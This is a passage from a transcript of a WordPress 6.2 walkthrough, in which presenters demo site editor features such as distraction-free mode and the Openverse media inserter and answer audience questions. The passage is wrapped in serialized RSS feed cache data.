I\'m gonna go and leave...\n\n<strong>Anne McCarthy </strong> 21:25\nThat back button was a big piece of feedback people had they would get into the site or not know how to get back out. So I appreciate you calling that out.\n\n<strong>Rich Tabor  </strong>21:32\nYeah, exactly. It\'s been through a number of iterations. And I think we\'ve settled on something that feels feels nice; it does feel nice.\n\n<strong>Anne McCarthy  </strong>21:41\nI agree.\n\n<strong>Rich Tabor  </strong>21:43\nSo...\n\n<strong>Anne McCarthy  </strong>21:44\nAh yes, the removal of the beta label.\n\n<strong>Rich Tabor  </strong>21:46\nYou want to talk to this, Anne?\n\n<strong>Anne McCarthy  </strong>21:48\nYeah, I would love to jump in on this actually. So you\'ll notice that the beta label is removed for this release. And part of why we wanted to show it now is to see how all the features, how the experience has changed, how much more you can do. And all of that has led to the removal of the beta label. And that doesn\'t mean that feature development is done that it\'s like, you know, gonna stay this way forever, it just means it\'s in a place where we invite you all to try to the site editor, it is out of beta. And a lot of development work has gone into testing this. So we\'ve had almost, I think, 20 calls for testing with the outreach program. It\'s been through multiple major WordPress release cycles, there is still more work to be done. But I\'m very excited to see the beta label removed, I think the features that are coming to 6.2. And the foundation that is set with 6.2 really marks a level of maturity. That is pretty exciting. So consider this an invitation to try out modern WordPress, and to check it out.\n\n<strong>Rich Tabor</strong>  22:43\nA hundred percent, I couldn\'t have said it better.\n\nAlright, so another neat part that\'s added recently for 6.2 is this idea of distraction free mode. So it\'s not turned on by default, but I have it on so we can see the results here. So you can go in and type right here. And then actually, I\'m gonna throw in some Lorem here. So you can see it in action. So this feels more like a text editor and less like a Block Editor. Whenever distraction free mode is on even the the multi block selection, it feels really nice. It doesn\'t there\'s not this idea of blocks, even it\'s kind of abstracted from here, there\'s less noise, there\'s less distraction. And just think that the idea is that it\'s just you and your words, it\'s just writing and publishing. And if you want to publish, you can hover over here, you\'ll see the toolbar come down, you can hit Publish or draft. And then this is how you would turn it off and back on here. And then you still have control of all the existing tool. And it\'s just a much simpler, streamlined interface. And you do have access to blocks, you can still add them if you\'d like to, but the idea is just being able to write without the distractions is really powerful. And a really nice publishing experience overall.\n\n<strong>Anne McCarthy  </strong>24:08 \nAnd this is for everyone. So this is like a lot of stuff we\'re coming to say it or using a block theme. This is available for anyone who\'s using the Block Editor. And to be honest, I use this for basically all my writing now. Especially for any post or page, I typically will go into this mode. So I\'m very excited about this. And I hope folks feel the same way.\n\n<strong>Rich Tabor  </strong>24:28\nYeah, exactly. I\'ve been using that too for quite a bit. But the thing is, is also not only for post editing, so I have a page here that I\'ve created. And I have distraction free mode turned on, which kind of removes all the extraneous tooling and it really lets me focus in on the actual blocks here so I can manipulate them to an extent. I can even drop in different imagery for these images here and modify the buttons and whatnot and even add more blocks but the idea is it\'s almost like a simplified editing experience for pages as well, not only for posts. And here, I\'ll come up here and turn off distraction free mode to see it all in real time.\n\n<strong>Anne McCarthy  </strong>25:13  \nAnd this isn\'t yet available for the site editor, but I have a feeling a number of folks are going to be keen to see that put in there as well.\n\n<strong>Rich Tabor </strong> 25:20  \nExactly, yeah, I don\'t see why it wouldn\'t work in the site editor as well. I think it\'d be very nice. Yeah. So we have some other improvements here that are fun. So this inserter here has gotten a couple of changes here. So blocks looks familiar, it\'s still the same, but patterns is where we started seeing some changes. Instead of having some featured patterns loaded in a block category selector, we\'ve split them out individually as their categories here, you\'re gonna load up some of the different header patterns that are loaded in WordPress 6.2. So you can load them here and see them in this tray, and then click to add them to your site. Which is really nice, it\'s a nice way to kind of go through them quickly and see a bunch of different ones. We also have the media tab up here, which is new, which splits out the images from your Media Library, videos, and audio as well, including the Openverse library. So this is a catalogue of, I believe, over 600 million free, openly licensed stock imagery. And you could search from right here in the inserter. So let\'s type in birds. And click on one, and it will add an image block with the image already added to it, we have got the caption down here. If you don\'t want the caption, you just turn it off right here, this little control that was added. And now you can manipulate it right off. So let\'s say this, drop it into here. Maybe we\'ll make these about the same size and move it over to something interesting.\n\n<strong>Anne McCarthy  </strong>26:53\nAnd I\'ll note that there was a GDPR concern around the images being properly uploaded rather than hotlinked. And I wanted to just note that that\'s been addressed. So the images are uploaded to your Media Library. That\'s why. So in case anyone has that question. Sorry, continue.\n\n<strong>Rich Tabor  </strong>27:08\nYeah, no, that\'s a good point. It\'s very important. A key benefit to have this flow here is that instead of instead of having to add an image block, and then open your Media Library, and then pick an image, and then you have it here, it\'s really this one flow of searching visually, and searching here, as well. And then having it added as an image block already. So it kind of skipping all the extra steps that you always have to do anyhow, it\'s really nice. And we have a couple of interface changes. So there\'s the settings icon up here that used to be a cog, and now it represents the sidebar itself. So when you open it, the sidebar is triggered, if that\'s closed. And that\'s changed for a couple of reasons. But one of the bigger reasons is, as I mentioned earlier, this idea of split tabs, so we have the cog for settings. And that\'s when a block has additional settings that are not per the norm of the styles that are available within WordPress, then you\'ll have a new settings tab pulled out here. And that\'s to keep the density nice whenever you\'re editing and it feels good instead of having everything kind of in your face all at once. Now for other blocks, like the paragraph block, there\'s not additional settings, so automatically not included. The tabs up top and just be everything top level. But  when a third party plugin adds like a different settings panel, or even if you extend one of these core blocks that does not have one, and a detects one should be auto added as well. So it\'s kind of just like a nice, fluid way to continue improving the experience of editing within WordPress.\n\n<strong>Anne McCarthy </strong> 28:49\nYeah, so plugin authors can also kind of make sure where they want settings and styles to show that it shows up correctly. And there\'s a dev note about that as well.\n\n<strong>Rich Tabor  </strong>28:58\nYes, that\'s right, you can you can decide as when you\'re extending or adding your own inspector controls. That\'s what these are called here, whether or not they\'re included within styles or settings as well. Yeah.\n\nThen another smaller change that\'s kind of nice is this idea of pulling the outline from its own toolbar item up here into the list view. It\'s because they\'re very relative, you know, a list of all the blocks on your page, also an outline of what\'s going on. So they\'re combined now into this one view. We also have time to read word count and character count here, which is nice. And then this is a little guide here that just helps you understand the structure of the importance of the structure of the document and making sure that it is properly structured. All right, was there anything else that we wanted to add you think, Anne?\n\n<strong>Anne McCarthy  </strong>29:51\nI\'ll add one last call out just because I\'m trying to think about like little dev tidbits if you want to disable it prefers there is a way to disable Openverse as well I know that\'s always a concern. We add something it\'s like, okay, how do we get rid of because I don\'t want a client getting into it, there is a way to disable that is documented as well. The other thing is the pattern. So there\'s new categories, the patterns. And so query is now posts, a couple of things were merged, there\'s no call to action. And there\'s also some lovely, which I\'m gonna brag on Rich, again, some new text based, query patterns. We have a lot of visual patterns for the query loop, and now there\'s wonderful, more text focused ones, which I think is really exciting. And just another great way where patterns have evolved and patterns is obviously a huge part of the future building with WordPress. So I\'m very excited about those and keen to see just more variation with query loop, I think it\'s really powerful block to make easier to use. So I\'m excited to see it. Otherwise, I think that\'s, I think that covers a lot of what we were trying to go through.\n\n<strong>Rich Tabor </strong> 30:57\nYeah, and there\'s certainly more. There\'s a lot of interesting, minute details that are, you know, quality of life improvements around editing and designing. And we can\'t cover them all today. But it\'s just, there\'s a lot of exploratory ideas and cool, interesting pieces that have been the result of lots of feedback and lots of testing, like I mentioned earlier. And, you know, it\'s really a testament to open source and contributing and really working together as a team to make this thing we call WordPress ours and making it a brilliant publishing experience. So just thank you to everyone who\'s put in time ideas, effort, code, design, marketing, copy, all of that, and more to making this what it is. It wouldn\'t be possible without you.\n\n<strong>Anne McCarthy  </strong>31:46\nTotally agree. And thank you, Rich, for doing such an excellent job building this site and demoing all this.\n\n<strong>Nathan Wrigley  </strong>31:51  \nYeah, indeed. Thank you, Rich. Thank you, Anne. Just to let you know that, in theory, there\'s possibly up to about 25 minutes left. If anybody wishes to pose a question, we\'re going to do our best to get the answer directly from Rich and Anne. Whether that means putting the screen back on, I don\'t really know. But we\'ve got a few that have come in. The place to put those, it would appear that some people have figured out how to do that in Zoom. But if you go to the walkthrough channel, in the making WordPress Slack, you can post some questions in there and all things being equal, we\'ll get them raised as quickly as we can. So we\'ve got a few. In all honesty, because they\'ve been copied and pasted from various different places, I can\'t necessarily say who the name of the person is that sent them. But first question I\'ve got over here for either of you. It says when you save globally, under the Advanced tab, does this change the stylesheet? Interesting.\n\n<strong>Rich Tabor  </strong>32:54 \nSo this will change the attributes of the blocks. So if I throw in that example, there, I pushed the attributes of that one block globally. So they\'re applied to every block. So it does affect some styles, but not writing any style sheet or writing to the core style sheets.\n\n<strong>Nathan Wrigley  </strong>33:11\nCan I ask the question? It\'s not something that\'s been submitted by anybody else, but it just occurred to me that as you were clicking the global button, I just wondered if there was a \"get out\" from there. In other words, if you inadvertently click the global button, is there an undo option in there? In other words, can you back away from all of the buttons suddenly changing or all of the H1s? \n\n<strong>Anne McCarthy  </strong>33:32 \nYou do have to hit save after. You can\'t just hit Apply globally. You have to hit save, and that\'s where the multi-entity saving pops up. The multi-entity saving is kind of strange in that it\'s not good at discarding changes. So you basically would just have to like leave. Like it would be like, Whoops, I hit that. You probably also have to hit the undo. Like there\'s - those are the two kind of options. So, yeah.\n\n<strong>Rich Tabor </strong> 33:54 \nYeah. The undo is like a global thing. It works there as well. Yes.\n\n<strong>Anne McCarthy</strong>  33:58 \nAnd there\'s a reason that feature is hidden, like under Advanced and collapsed. That\'s not necessarily for everyone. But for folks who do like to tinker, it is available.\n\n<strong>Rich Tabor  </strong>34:08  \nRight. And it\'s also only available in the site editor as well. So it\'s the more the global view of editing your site is where you can access that. \n\n<strong>Nathan Wrigley  </strong>34:17  \nPerfect.\n\nOkay, so I have a question from Zoom. Is copying and pasting styles as demonstrated just for core blocks? They go on to say more, which I\'ll read out. Some blocks collect, some block collections have their own C&amp;P, and I\'m curious what might carry over, if anything? And then there\'s a follow up. Also, if CSS classes are assigned to a block, will applying global styles to a block be to all of the same block, i.e. H2? Or, hopefully, will a custom class allow for a more granular global CSS? There\'s a lot in that question, but if we start with the: is copying and pasting styles demonstrated just for core blocks?\n\n<strong>Rich Tabor  </strong>34:56  \nSo it works for blocks that have leveraged the block support system within core. So if you have opted your block into using background color, and text color, link color, any of the layout settings, anything that was in the styles tab, then all of those would get pushed to or get copied or pasted or even pushed to the global application of styles as well. Now, if there\'s, if a block has done its own sort of background color attributes, I don\'t know that those would persist as well. But if you use what\'s available in core, it\'s really one or two lines of JSON will get you the background color support that you need. \n\n<strong>Nathan Wrigley</strong>  35:35\nAnything to add to that, Anne?\n\n<strong>Anne McCarthy  </strong>35:37  \nNo, just another reason to rely on what core is building. So it\'s a another great example of how these features will work together and how adoption helps whenever these new things come out.\n\n<strong>Nathan Wrigley  </strong>35:49  \nOkay, so we\'ll go on to the next question then. So this is from Zoom, and apologies, I don\'t know your name. Can we have this as a feature request? Can we have sticky sidebar block for some groups next release, please? \n\n<strong>Anne McCarthy </strong> 36:05 \nProbably would do a separate block, I\'m guessing. Yeah, do you have anything to add to that?\n\n<strong>Rich Tabor</strong>  36:11\nYeah, I would say we wouldn\'t need a sticky sidebar block. Right now that group lock in top level-only does support position sticky. And the only reason it was turned off like we did have it on for one of the Gutenberg releases for everything - for every group block - but it was turned off just because there was too much confusion around if you had a sticky element that wasn\'t didn\'t have enough space to stick for and enough height to stick. So it wouldn\'t actually be sticking. You wouldn\'t see a result of you applying a sticky position to it. So I think we can figure that out with some some UX to really clean that experience up so that you do expect and understand what\'s going on. When you apply that to a block. That\'s not the root level of the document. So it\'ll be there. It just takes a little bit more iteration.\n\n<strong>Nathan Wrigley</strong>  37:00\nOkay, another question. This time from Slack. When there are changes made in the site editor, are the templates still marked with the blue dots to indicate that the changes are in the database?\n\n<strong>Rich Tabor  </strong>37:14\nYes, from that Manage Templates view that I shared in the canvas, it will show up just like it did previously, when there are changes to one of the templates provided by the theme.\n\n<strong>Anne McCarthy </strong> 37:25\nYou can revert the changes, as well, as you\'re used to doing.\n\n<strong>Nathan Wrigley </strong> 37:30\nOkay, thank you. Anne\'s shared a link related to the question that we just posted. I don\'t know how Zoom works well enough to whether or not we can share the screen. \n\n<strong>Anne McCarthy  </strong>37:40\nI can briefly share my screen. \n\n<strong>Nathan Wrigley  </strong>37:42\nYeah, that\'d be great. Show us the GitHub.\n\n<strong>Anne McCarthy </strong> 37:43\nLet me try that. I just wanted to mention this in case people want to follow along in the follow up tasks related to this. I love to look at links. I\'m a nerd like that. So in case anyone else is, this is a lot of the follow up tasks and a great issue to chime in on or just follow if you\'re interested in this because there are some improvements to be made. But this is a neat report for now. So it\'s - oh, I just copied and pasted. So it\'s issue number 47043 in the GitHub repo.\n\n<strong>Nathan Wrigley </strong> 38:11\nSo 47043 related to the question that we just had. Okay, so another one from Zoom. This is Robin, who asked the question, can you show? It\'s just moved on my screen. There we go. Can you show us how to trigger the focus mode to view, say, for example, the footer on its own? So I guess we\'re back on the screen again.\n\n<strong>Rich Tabor  </strong>38:34\nSure. Everyone can see? Yep. So when you have a template part selected, you just hit the Edit button here and then it\'s focused into that as well. And then you have, again, the responsive controls here. All the existing controls, it\'s just localized to this template part.\n\n<strong>Nathan Wrigley  </strong>38:54\nHopefully that answers your question. Thank you, Robin. Just for anybody who\'s kind of lurking who has a question but hasn\'t yet posted it, please do. What are the chances that you\'re going to get Rich and Anne on the on the phone in the next few weeks? Pretty minimal, I\'d say, so make use of them while they\'re here. Ellen has done just that. She\'s in Slack. Ellen says, is there a plan to allow no title templates in the block editor as they are still included even in header and footer-only templates?\n\n<strong>Rich Tabor</strong>  39:28\nNo title templates. Like templates without a title? I\'m not quite.\n\n<strong>Anne McCarthy </strong> 39:35\nYou can just remove that block. \n\n<strong>Rich Tabor  </strong>39:36\nYeah, you can you can remove the post title block from a template. I\'m not quite sure if that\'s if that\'s what the question is asking.\n\n<strong>Nathan Wrigley  </strong>39:46\nEllen, if you\'re still in Slack and watching this, if you heard Rich and Anne queerying that, then if you can give some more clarity, we\'ll endeavor to get that answered.\n\n<strong>Anne McCarthy</strong>  39:57\nKnowing Ellen she knows exactly how to remove things. So I\'m like, I\'m curious. I\'m definitely - we\'re misinterpreting something because she\'s very - Not showing the title in the editor...?\n\n<strong>Nathan Wrigley  </strong>40:07\nYeah. Not showing the title in the editor. She says she\'s here. \n\n<strong>Anne McCarthy  </strong>40:12  \nI\'m like, \"Say more.\" \n\n<strong>Nathan Wrigley </strong> 40:14 \nYeah. Give us more. Give us more Ellen, and we\'ll get right back to you.\n\n<strong>Anne McCarthy  </strong>40:17\nLet\'s follow back up on that, because Ellen always has some good questions and good feedback.\n\n<strong>Nathan Wrigley</strong>  40:21\nAll right. We\'ll do just that. Again, another question from Zoom. This is posed by some anonymous person. Will the list views icon get the same treatment as settings?\n\n<strong>Rich Tabor  </strong>40:33\nI don\'t think it\'s in the plans. I don\'t think there are plans to change that. But list view icon, it\'s always the list view. So when you toggle it on and off, it\'s relative to what it is. Whereas on the other side, the settings can be block settings, page settings, template settings. Global styles is in that same area. So it\'s a little bit more context for the list view to stay a list view item.\n\n<strong>Anne McCarthy  </strong>40:58\nAnd I know that the question came up because the settings icon looks like there\'s that sidebar. And so there are who people have been asking like, will the same thing happened over here? Just for context. That was part of a discussion in a different GitHub issue.\n\n<strong>Nathan Wrigley </strong> 41:12\nOkay, thank you very much. I appreciate very much those people who are posing questions. That\'s really great. Again, just to prod you once more, feel free to add your own questions in no matter how big or small they are. We\'re here to help. So now we have a question on Zoom from Abdullah. And he coincides beautifully with a question I\'ve written down. Any good resources to learn FSE theme-based development? Can either of you point to a particularly good resource that you know of?\n\n<strong>Anne McCarthy  </strong>41:41\nYeah, Learn WordPress. There\'s tons of stuff on Learn WordPress that I would recommend. I also, Daisy Olson, who\'s Developer Relations at Automattic, has a Twitch stream going and some YouTube videos around block theme development. But I would recommend going to Learn WordPress. There\'s also some contributor-led initiatives. Carolina, who\'s one of the theme folks has, I think, it\'s fullsiteediting.com. And that was kind of like the original, go-to resource. And she\'s done an incredible job working on that and keeping it up to date. So yeah, there\'s tons of tons of resources. I will spare you from from sharing more, I don\'t know, Rich, you have more hands-on experience there. What\'s the most helpful for you?\n\n<strong>Rich Tabor</strong>  42:22\nYeah, there\'s some really great tutorials and guides on Learn that are relatively new, that are really helpful. And I see that the team there has been really cranking it out on the last year or two, like really putting a lot of effort into this. So I would, I would start there.\n\n<strong>Nathan Wrigley  </strong>42:38\nSo if you\'re not familiar with that, I guess it would be apropos to say go to your browser of choice and type in learn.wordpress.org and go and explore. Basically, there\'s a ton of materials that are getting updated on what feels like a daily basis at the moment. So, once more, learn.wordpress.org. Go and check that out. But also, Anne in the chat that we\'ve got going on here has linked to Daisy Olsen\'s Twitch channel, which - I\'m just going to read it out but hopefully I\'ll make it into the transcript. twitch.tv/DaisyonWP. And it\'s all one word. D-A-I-S-Y-O-N-W-P. Daisy on WP. So there\'s two great places to go. But the learn.wordpress.org is perfect.\n\n<strong>Anne McCarthy </strong> 43:24  \nI have to add one more thing, which is if you\'re not fully ready for block themes, one of the big things that I feel like needs to be emphasized more is you can gradually adopt. So all these features are being done. But maybe you want to only give access to a client to edit the header. You can do that. Maybe you want to leverage theme.json in your classic theme, you can do that. If you want to expose the template editor.\n\nBut use the rest of your themes across them, you can do that. So I want to also encourage folks to look into resources around gradual adoption, because it makes sense that this stuff isn\'t - From day one, there has been a focus on that. Adopt what you what you want, when you want and it\'s going to make sense to different people at different times. Matías once said that to me, and I think it rings really true. And so now that we\'re at this level of maturity, I think we\'re looking again and revisiting again, like okay, what can I use? What do I want to use? I think it\'s really important to mention. So if you\'re not ready to go all in, I encourage you not to just wipe it all away, but to think about how you can gradually adopt and also what would help you gradually adopt. So there is actually a label on GitHub started a couple months ago around - It\'s called blocks adoption. So if there\'s something that you see that you\'re trying to adopt the site editor, and it\'s preventing you from doing so, like we want to know about that. And you\'re welcome - I\'m going to just put this out here - @annezazu is my GitHub username, feel free to just like @ annezazu, \". This is blocking me from using the site editor.\" We want to know these things. Open issues. Please share, because that is also part of the phase of this work is making sure people can adopt as they can and that the tools are robust. There\'s a ton of resources as well. There\'s a page in the Theme Handbook around gradually adopting to block themes. So I just wanted to call that out.\n\n<strong>Nathan Wrigley </strong> 45:06 \nAnd just one more time, what was that? Give us, the give us the username.\n\n<strong>Anne McCarthy  </strong>45:11<strong>\n</strong>A-N-N-E-Z-A-Z-U. So like Zazu from The Lion King. It\'s an inside joke from middle school.\n\n<strong>Nathan Wrigley </strong> 45:19\nOkay, possibly the shortest question. This is from Sandy, I should say, Can Lotties be added to 6.2?\n\n<strong>Rich Tabor</strong>  45:28\nI would say that I did a quick search a few minutes ago and there are various blocks built by the community, which do allow you to add or embed LottieFiles to your site. I haven\'t tested any myself but feel free to dig into those. And if they\'re open source, they can contribute ideas or feedback on on those GitHub repos.\n\n<strong>Nathan Wrigley </strong> 45:49\nThank you very much. And Eagle has posted a question. When there are changes made in the site editor, are the templates still marked up - Did we have that one? We have, right? We\'ve done that. \n\n<strong>Anne McCarthy </strong> 46:01\nWe answered that one. Yeah.\n\n<strong>Nathan Wrigley</strong>  46:02\nI think we did. Okay, moving on directly then to Ian, what is - oh! Okay, what is the philosophy for mobile in the editor? Are there any plans to have a mobile view?\n\n<strong>Anne McCarthy </strong> 46:16\nThat\'s part of the dragging and resizing. And there\'s a lot of work being done around intrinsic design. And you can see on the developer.wordpress.org? What is the blog? I think it\'s /news. Do you hear audio?\n\n<strong>Nathan Wrigley  </strong>46:35\nI hear only your audio. I don\'t hear anything I don\'t wish.\n\n<strong>Anne McCarthy</strong>  46:36\nOkay, sorry. Something just started playing in the background out of nowhere and that just scared me. It\'s like all of a sudden, I was like, woah! Where was I?\n\n<strong>Nathan Wrigley </strong> 46:50\nSo we were talking about mobile views?\n\n<strong>Anne McCarthy </strong> 46:53\nYes, intrinsic design. There is a developer blog that if you\'re not following that, you definitely should, that addresses this around, basically showing that the mobile view points have exploded over time. It\'s now really not sustainable to try and have CSS and all this sort of stuff, mobile queries allowing for each view. So instead, how can we think about intrinsic design? And so that\'s like the best answer I can give. And for now, there is this nice resizing that you can do to kind of see how things scale. 6.1 introduced fluid typography, which was really exciting and part of this larger, intrinsic design set up. And I think we\'ll expect to see more of that over time. Sorry, for the brief mental break.\n\n<strong>Nathan Wrigley  </strong>47:36\nJust a quick reminder, we probably got 5, 6, 7 minutes or something like that before we start to wrap things up. So if you\'ve got any questions, please, please do post them in here. We have one from Paul who asks, is there any more work planned for pattern management in the future? And then WP Engine has released a plugin allowing easier management of patterns recently, I believe that was yesterday, it would be good to know if we should wait for core or assume that nothing else is coming soon.\n\n<strong>Rich Tabor  </strong>48:07\nYeah, I would say that pattern management is an important part of this new WordPress experience and having a way to create and manage local patterns, but also maybe push them to the pattern directory. And then on top of that, having a functionality built in where - it\'s kind of like a component based system where you have patterns where the design is the same across patterns, but content can change. All of that kind of falls into the same category of work. And that is something I believe WordPress will eventually do as well.\n\n<strong>Nathan Wrigley</strong>  48:41\nOkay, we\'ve got no more questions on the screen. So I\'m going to ask a question, if that\'s all right. You were demonstrating the distraction-free mode there where you could move things up, move things down, and resize pictures and images and so on. I was just wondering what the constraints on that are. So in the case of images, I could see that you could resize things. And with the text, I could see that you could, you know, highlight things and start typing wherever you wish. But I just wondered how the decisions had been made to set those parameters and those only. So yeah, around that, what\'s available in distraction-free mode? What limitations are there?\n\n<strong>Rich Tabor  </strong>49:17<strong>\n</strong>I would say, generally, it\'s what\'s available is what happens when you click on a block. The tooling is there available on the canvas before so resizing was available on the image but not the toolbar. So the resizing is still available when you\'re in distraction-free, but maybe not adding the caption piece or you know, those other toolings. It\'s almost like the content locking or content only locking API. It\'s very similar to that in a sense, but a little bit more tightened up.  Where just text and dropping in images - you can\'t necessarily open the Media Library from there unless you dive out of it. But you can drop another image onto that existing image to replace it. Some things like that.\n\n<strong>Nathan Wrigley  </strong>49:59<strong>\n</strong>It looks like a really excellent interface for people who just, well, want to concentrate on their writing. It sounds like Anne\'s all in on it.\n\n<strong>Anne McCarthy</strong>  50:05\nI use it every single day. It\'s amazing.\n\n<strong>Nathan Wrigley </strong> 50:09  \nIt almost felt like a Google doc minus all the bits and pieces at the top. Yeah, really, really nice. Okay, so we have some more questions. Weston is asking, what about optimizing the experience of editing using a mobile device on the web? So I guess that\'s a little bit maybe the question that we had earlier. How can... we how can we do things on a actual mobile device? \n\n<strong>Anne McCarthy </strong> 50:30\nThat\'s a great question. There are mobile apps. So there is the mobile team and using the mobile apps. I personally don\'t use mobile apps and sometimes will edit things from Safari on my iPhone SE 2.\n\nI actually was talking to someone - their username is Nomad Skateboarding. And from what I understand, he only builds client sites from his phone. And so one of the things I said to him, I was like, \"Give us your feedback. That\'s really cool. It\'s really unique. That\'s fantastic. Like, what pain points you\'re running into, what can we improve?\" Because there is obviously like, we are in a mobile first world. My phone is sitting right next to me. I would love to hear particular pain points folks have when trying to edit in that way. You can obviously use the apps. There are some quirks with the site editor, and that I know is partially being looked into and resolved. But yeah, I think there are probably - what we\'re building now should always translate back and there are teams trying to sync back and forth. And there was a recent post from the mobile team talking about what\'s the future of mobile editing. And so I would recommend - it\'s somewhere on Make/Core. I recommend digging that up and getting involved and honestly sharing your feedback. Because I don\'t think that is an experience that we talked about enough personally.\n\nIt\'s a great question. \n\n<strong>Nathan Wrigley  </strong>51:40\nRich, anything or should we move on?\n\n<strong>Rich Tabor  </strong>51:42 \nI think that was great.\n\n<strong>Nathan Wrigley </strong> 51:44 \nOkay, perfect. Um, um, um. Okay, we have an anonymous question. It says as page speed is a big challenge, how are we optimizing the blocks for better LCP score?\n\n<strong>Anne McCarthy</strong>  52:00 \nThere are, some interesting - sorry, Rich, I don\'t know if you wanted to jump in. I was going to start link dropping. \n\n<strong>Rich Tabor  </strong>52:05 \nYeah, you go ahead. Yeah. \n\n<strong>Anne McCarthy  </strong>52:07  \nYeah, there\'s some interesting work from André. Part of it involves actually adding tracking and making sure there\'s really good front end metrics. So there\'s kind of a twofer going on. In one fell swoop, we\'re focusing on better tracking and improving the tracking that we have for performance, particularly the front end. And then at the same time, also work is being done to optimize like style sheets. There\'s been some really neat stuff in previous releases that I bet I can pull up if you\'ll give me one moment.\n\n<strong>Nathan Wrigley  </strong>52:36\nYeah, whilst you try to find that, Anne, I think it\'s probably important to say that, if there are any questions which you wish to have answered which don\'t somehow get answered in the next few moments, then there will be posts created around this piece. So anything that goes missing, any question that is unanswered, there will be endeavours to get them answered. Right? Okay, show us what you got, Anne.\n\n<strong>Anne McCarthy  </strong>53:00  \nYeah. So this was a post I did for 5.9, in conjunction with a whole ton of folks who contributed and actually did this work, I just was kind of gathering it up. But you\'ll see sections here around block style sheets and CSS loading. And honestly, a lot of the work with the styles engine, which is part of the global styles project, can help give a lot of opportunity to actually improve this, I recommend checking out this post to see some of what\'s already been done. And then in the future, one of the discussions that we had recently with some folks across the community from Google, from Automattic, 10up, all over the place, including our lovely performance lead, Felix. We talked about some of this stuff and about how to talk about particularly themes and also just blocks in general. And thinking about some performance improvements and developer education and automated testing and all sorts of stuff. So I won\'t go too far into this. But I think a lot of work can be done. And some of it is being done around measuring more front end metrics and very recently, LCP was added and started to be tracked here, which I think is pretty exciting. \n\n<strong>Nathan Wrigley  </strong>54:05 \nI think following the performance team and Felix Arntz, in particular, would possibly get you quite a long way towards your answers there. Okay, a couple more. Firstly, there\'s a few people helping out in the Slack channel. So, appreciate that. We\'ve got Matías answering questions, and so on. So that\'s really amazing. Thank you. Another anonymous question, any plans to support CSS Grid?\n\n<strong>Rich Tabor  </strong>54:33 \nI think it\'s something worth exploring. Probably not the major priority coming up. But definitely some interesting aspects that we\'ve seen other... other building applications do that we can learn from for sure.\n\n<strong>Nathan Wrigley  </strong>54:47  \nOkay, we\'re very short on time now. I think we\'ve got to round it off at the top of the hour. So we\'ve got about four minutes left. I\'ve got to wrap it up a little bit. So try to get these last two done if we can. This is from Mary. What are the typography options as of 6.2? we have Google fonts and self-hosted. Any plans for solutions like Adobe Type and Monotype?\n\n<strong>Anne McCarthy  </strong>55:11 <strong>\n</strong>There\'s a Fonts API that got booted from 6.2 and is hopefully planned for 6.3. So I would just follow that effort. So right now, 6.2 is not introducing anything new or different there. Things are as they were. There\'s a private API that folks can can use with anything JSON. That\'s as concise as I can be.\n\n<strong>Nathan Wrigley </strong> 55:31\nNo, that\'s perfect. I think we\'re three minutes to go. That\'s probably the best time to wrap up the Q&amp;A. Apologies if you had a question and it didn\'t get answered. As I said, there will be a whole load of things created off the back of this. We will make sure that there\'s a transcript available and - just read something in the comment. Hopefully, any questions that have been asked but unanswered will be answered approaching that. Just very, very quickly, I have to say thank you to Anne and Rich in particular, for taking the time out of their busy schedules and demoing what 6.2 can do. It really looks like a transformational release. But also, thanks to Chloé and Jonathan and Lauren and Mary who are on the call, but, you know, you haven\'t necessarily seen them right now. So, appreciate them. That\'s really great. Following up off this, I\'ve got three points to mention. Following the 6.2 release on Make/Core for development updates and calls, there\'s going to be a post. It\'s make.wordpress.org/core/6-2. Also, if you\'ve been keeping a close eye on the Beta releases - I say beta, I know it\'s hysterical. The beta releases, we\'ve got version beta four has just been released. And anybody who wants to test that out would be most welcome. The URL for that is far too long for me to say out loud, but you can Google it, I\'m sure, and find out how to test for that. And also, if you are keen to follow WordPress, it\'s all over the social networks. And you can follow - basically, if you try to just follow @WordPress, then you\'ll get somewhere. So for example, on Twitter, it\'s WordPress - @WordPress. On LinkedIn, it\'s /company/WordPress. Instagram is @WordPress. And guess what? On Facebook, it\'s - what do you think it would be? It\'s @WordPress. So it\'s available all over there. And I think that\'s it. I think that\'s everything that we\'ve got to say. We\'re about one minute away from closing. So particular thanks to Rich and Anne, but thanks to everybody in the background making all of this happen. Thanks for showing up. If people don\'t show up, the work never gets done and the project never moves forward. So fully appreciate anybody who\'s given up their time to ask questions today and watch this presentation.\n\n<strong>Anne McCarthy </strong> 57:51 \nAnd thank you, Nathan. I want to call you out as being an excellent moderator and creating a safe space for us.\n\n<strong>Nathan Wrigley </strong> 57:57  \nVery, very welcome. I enjoyed doing it. I would gladly do it again. All right. I don\'t know how to end this call. So I\'m just gonna wave. Bye, everyone.\n</pre>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14573\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	